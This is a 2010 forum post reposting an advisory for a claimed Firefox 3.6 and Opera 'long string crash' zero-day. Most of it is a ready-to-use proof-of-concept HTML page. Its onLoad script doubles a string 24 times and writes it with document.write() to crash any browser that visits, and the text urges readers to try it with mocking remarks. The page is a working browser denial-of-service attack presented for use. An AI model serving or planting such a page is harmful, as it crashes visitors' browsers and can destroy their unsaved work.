pyth0n3 Posted March 2, 2010 Report Posted March 2, 2010 ===============================================================Mozilla Firefox v3.6 and Opera Long String Crash (0day) Exploit===============================================================#VulnerabilityThis bug is a typical result when attacker try to write plenitude String indocument.write() function .User interaction is required toexploit this vulnerability in that the target must visit a maliciousweb page.#ImpactMOzilla Crash #Proof of conceptcopy the code in text file and save as "asheesh.html" and closed all tabs and windows to avoid any lost of dataopen in Mozilla Firefox and wait for 15 sec ...... and say Good ByeMozilla .......Per usske phele Mozilla k antim darshan kar le Prem se bolo jai maata diMozilla Rest In Piece!!!!!!!!!!!!!!!!!!!!!!!!!!!======================================================================================================================== asheesh.html========================================================================================================================<html><title>asheesh kumar mani tripathi</title></br>Asheesh kumar Mani Tripathi<head><script>function asheesh () { var i=24 , anaconda = "XXXX" for(i=24;i >0 ;--i) { anaconda=anaconda+anaconda; } document.write(anaconda);}</script></head><body onLoad="asheesh()"></body></html># ~ - [ [ : Inj3ct0r : ] ] Quote